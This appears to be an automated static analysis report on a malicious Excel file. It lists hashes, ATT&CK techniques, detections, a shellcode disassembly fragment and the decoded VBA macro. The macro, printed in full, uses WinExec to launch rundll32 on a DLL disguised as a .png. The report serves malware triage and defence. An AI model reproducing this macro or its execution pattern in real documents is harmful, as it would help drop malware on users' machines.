Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 603c2850f54b66e2…

MALICIOUS

Office (OLE)

415.5 KB Created: 2006-09-12 15:06:44 Authoring application: Microsoft Excel First seen: 2019-04-18
MD5: 68d719cc5a931d50cc3ab26d68ef480a SHA-1: b135482ae88d0a0fc90016a83a8d0ca9f957bf77 SHA-256: 603c2850f54b66e25636a222c3fa2b01f387e590f40d705e6a71ace7cc752aae
420 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1218.011 System Binary Proxy Execution: Rundll32 T1105 Ingress Tool Transfer

The VBA macro in this Excel file contains a call to WinExec, which is used to execute rundll32.exe with a seemingly benign DLL path that likely contains a second-stage payload. This is further supported by the detection of an embedded PE executable and Metasploit shellcode, indicating a downloader or dropper functionality.

Heuristics 10

  • ClamAV: Doc.Downloader.Jrat-6336393-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Jrat-6336393-1
  • Metasploit reverse_tcp shellcode critical SC_MSF_REVERSE
    Metasploit reverse_tcp shellcode
    Disassembly
    Attempted x86 opcode disassembly
    000431AF  fc                cld
000431B0  e882000000        call 0x43237
000431B5  5f                pop edi
000431B6  5e                pop esi
000431B7  5b                pop ebx
000431B8  8be5              mov esp, ebp
000431BA  5d                pop ebp
000431BB  c3                ret
000431BC  8d4000            lea eax, [eax]
000431BF  53                push ebx
000431C0  56                push esi
000431C1  8bd8              mov ebx, eax
000431C3  3b5324            cmp edx, dword ptr [ebx + 0x24]
000431C6  7436              je 0x431fe
000431C8  8bf2              mov esi, edx
000431CA  85f6              test esi, esi
000431CC  7518              jne 0x431e6
000431CE  33c0              xor eax, eax
000431D0  8a4318            mov al, byte ptr [ebx + 0x18]
000431D3  8b0485ccdb4400    mov eax, dword ptr [eax*4 + 0x44dbcc]
000431DA  50                push eax
000431DB  a178de4400        mov eax, dword ptr [0x44de78]
000431E0  8b00              mov eax, dword ptr [eax]
000431E2  ffd0              call eax
000431E4  8bd0              mov edx, eax
000431E6  895324            mov dword ptr [ebx + 0x24], edx
000431E9  c6434401          mov byte ptr [ebx + 0x44], 1
000431ED  8b4304            mov eax, dword ptr [ebx + 4]
000431F0  e8ba060000        call 0x438af
000431F5  85f6              test esi, esi
000431F7  7505              jne 0x431fe
000431F9  33c0              xor eax, eax
000431FB  894324            mov dword ptr [ebx + 0x24], eax
000431FE  5e                pop esi
000431FF  5b                pop ebx
00043200  c3                ret
00043201  8bc0              mov eax, eax
00043203  3b5028            cmp edx, dword ptr [eax + 0x28]
00043206  7413              je 0x4321b
00043208  895028            mov dword ptr [eax + 0x28], edx
0004320B  c6402c00          mov byte ptr [eax + 0x2c], 0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
    Sub Objet1_Clic()
WinExec "C:\Windows\SysWOW64\rundll32.exe" + Space(1) + "C:\Users\MASTER\Desktop\DLL\D.png" + "," + Space(1) + "EntryPoint", 1
End Sub
  • Reference to WinExec API high SC_STR_WINEXEC
    Reference to WinExec API
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1522 bytes
SHA-256: 4b993d8b6fcfae5d2b432c91783ad1f4ce1d685f51d6d954769a90df8b62ed06
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Feuil1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Function WinExec Lib "kernel32.dll" ( _
     ByVal lpCmdLine As String, _
     ByVal nCmdShow As Long) As Long ' WinExecu to run command
Sub Objet1_Clic()
WinExec "C:\Windows\SysWOW64\rundll32.exe" + Space(1) + "C:\Users\MASTER\Desktop\DLL\D.png" + "," + Space(1) + "EntryPoint", 1
End Sub



Attribute VB_Name = "Feuil2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Feuil3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
embedded_office_00001667.exe embedded-pe Office MZ+PE at offset 0x1667 419737 bytes
SHA-256: 5dfcaeda607ecc7fc358d35ba8525f2dda828492af8fe120a18907675d97319b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_MSF_REVERSE, SC_STR_VIRTUALALLOC, SC_STR_LOADLIBRARY Static shellcode analysis recovered API/import strings: LoadLibraryExA, VirtualAlloc, GetProcAddress, ExitProcess
ole10native_00.bin ole-package OLE Ole10Native stream: MBD00053CDD/Ole10Native 366359 bytes
SHA-256: d14eab0b19645df306c5c3c2504877c7ba0af674390070694191f5ecf41f3eab
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_MSF_REVERSE, SC_STR_VIRTUALALLOC, SC_STR_LOADLIBRARY Static shellcode analysis recovered API/import strings: LoadLibraryExA, VirtualAlloc, GetProcAddress, ExitProcess

Open this report in the interactive analyzer, or submit your own file for analysis.